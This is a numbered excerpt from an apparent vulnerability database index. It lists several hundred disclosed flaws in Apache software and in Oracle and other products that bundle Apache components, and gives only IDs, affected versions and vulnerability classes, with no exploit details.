4961| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
4962| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
4963| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
4964| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
4965| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
4966| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
4967| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
4968| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
4969| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
4970| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
4971| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
4972| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
4973| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
4974| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
4975| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
4976| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
4977| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
4978| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
4979| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
4980| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
4981| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
4982| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
4983| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
4984| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
4985| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
4986| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
4987| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
4988| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
4989| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
4990| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
4991| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
4992| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
4993| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
4994| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
4995| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
4996| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
4997| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
4998| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
4999| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
5000| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
5001| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
5002| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
5003| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
5004| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
5005| [123197] Apache Sentry up to 2.0.0 privilege escalation
5006| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
5007| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
5008| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
5009| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
5010| [122800] Apache Spark 1.3.0 REST API weak authentication
5011| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
5012| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
5013| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
5014| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
5015| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
5016| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
5017| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
5018| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
5019| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
5020| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
5021| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
5022| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
5023| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
5024| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
5025| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
5026| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
5027| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
5028| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
5029| [121354] Apache CouchDB HTTP API Code Execution
5030| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
5031| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
5032| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
5033| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
5034| [120168] Apache CXF weak authentication
5035| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
5036| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
5037| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
5038| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
5039| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
5040| [119306] Apache MXNet Network Interface privilege escalation
5041| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
5042| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
5043| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
5044| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
5045| [118143] Apache NiFi activemq-client Library Deserialization denial of service
5046| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
5047| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
5048| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
5049| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
5050| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
5051| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
5052| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
5053| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
5054| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
5055| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
5056| [117115] Apache Tika up to 1.17 tika-server command injection
5057| [116929] Apache Fineract getReportType Parameter privilege escalation
5058| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
5059| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
5060| [116926] Apache Fineract REST Parameter privilege escalation
5061| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
5062| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
5063| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
5064| [115883] Apache Hive up to 2.3.2 privilege escalation
5065| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
5066| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
5067| [115518] Apache Ignite 2.3 Deserialization privilege escalation
5068| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
5069| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
5070| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
5071| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
5072| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
5073| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
5074| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
5075| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
5076| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
5077| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
5078| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
5079| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
5080| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
5081| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
5082| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
5083| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
5084| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
5085| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
5086| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
5087| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
5088| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
5089| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
5090| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
5091| [113895] Apache Geode up to 1.3.x Code Execution
5092| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
5093| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
5094| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
5095| [113747] Apache Tomcat Servlets privilege escalation
5096| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
5097| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
5098| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
5099| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
5100| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
5101| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
5102| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
5103| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
5104| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
5105| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
5106| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
5107| [112885] Apache Allura up to 1.8.0 File information disclosure
5108| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
5109| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
5110| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
5111| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
5112| [112625] Apache POI up to 3.16 Loop denial of service
5113| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
5114| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
5115| [112339] Apache NiFi 1.5.0 Header privilege escalation
5116| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
5117| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
5118| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
5119| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
5120| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
5121| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
5122| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
5123| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
5124| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
5125| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
5126| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
5127| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
5128| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
5129| [112114] Oracle 9.1 Apache Log4j privilege escalation
5130| [112113] Oracle 9.1 Apache Log4j privilege escalation
5131| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
5132| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
5133| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
5134| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
5135| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
5136| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
5137| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
5138| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
5139| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
5140| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
5141| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
5142| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
5143| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
5144| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
5145| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
5146| [110701] Apache Fineract Query Parameter sql injection
5147| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
5148| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
5149| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
5150| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
5151| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
5152| [110106] Apache CXF Fediz Spring cross site request forgery
5153| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
5154| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
5155| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
5156| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
5157| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
5158| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
5159| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
5160| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
5161| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
5162| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
5163| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
5164| [108938] Apple macOS up to 10.13.1 apache denial of service
5165| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
5166| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
5167| [108935] Apple macOS up to 10.13.1 apache denial of service
5168| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
5169| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
5170| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
5171| [108931] Apple macOS up to 10.13.1 apache denial of service
5172| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
5173| [108929] Apple macOS up to 10.13.1 apache denial of service
5174| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
5175| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
5176| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
5177| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
5178| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
5179| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
5180| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
5181| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
5182| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
5183| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
5184| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
5185| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
5186| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
5187| [108782] Apache Xerces2 XML Service denial of service
5188| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
5189| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
5190| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
5191| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
5192| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
5193| [108629] Apache OFBiz up to 10.04.01 privilege escalation
5194| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
5195| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
5196| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
5197| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
5198| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
5199| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
5200| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
5201| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
5202| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
5203| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
5204| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
5205| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
5206| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
5207| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
5208| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
5209| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
5210| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
5211| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
5212| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
5213| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
5214| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
5215| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
5216| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
5217| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
5218| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
5219| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
5220| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
5221| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
5222| [107639] Apache NiFi 1.4.0 XML External Entity
5223| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
5224| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
5225| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
5226| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
5227| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
5228| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
5229| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
5230| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
5231| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
5232| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
5233| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
5234| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
5235| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
5236| [107197] Apache Xerces Jelly Parser XML File XML External Entity
5237| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
5238| [107084] Apache Struts up to 2.3.19 cross site scripting
5239| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
5240| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
5241| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
5242| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
5243| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
5244| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
5245| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
5246| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
5247| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
5248| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
5249| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
5250| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
5251| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
5252| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
5253| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
5254| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
5255| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
5256| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
5257| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
5258| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
5259| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
5260| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
5261| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
5262| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
5263| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
5264| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
5265| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
5266| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
5267| [105878] Apache Struts up to 2.3.24.0 privilege escalation
5268| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
5269| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
5270| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
5271| [105643] Apache Pony Mail up to 0.8b weak authentication
5272| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
5273| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
5274| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
5275| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
5276| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
5277| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
5278| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
5279| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
5280| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
5281| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
5282| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
5283| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
5284| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
5285| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
5286| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
5287| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
5288| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
5289| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
5290| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
5291| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
5292| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
5293| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
5294| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
5295| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
5296| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
5297| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
5298| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
5299| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
5300| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
5301| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
5302| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
5303| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
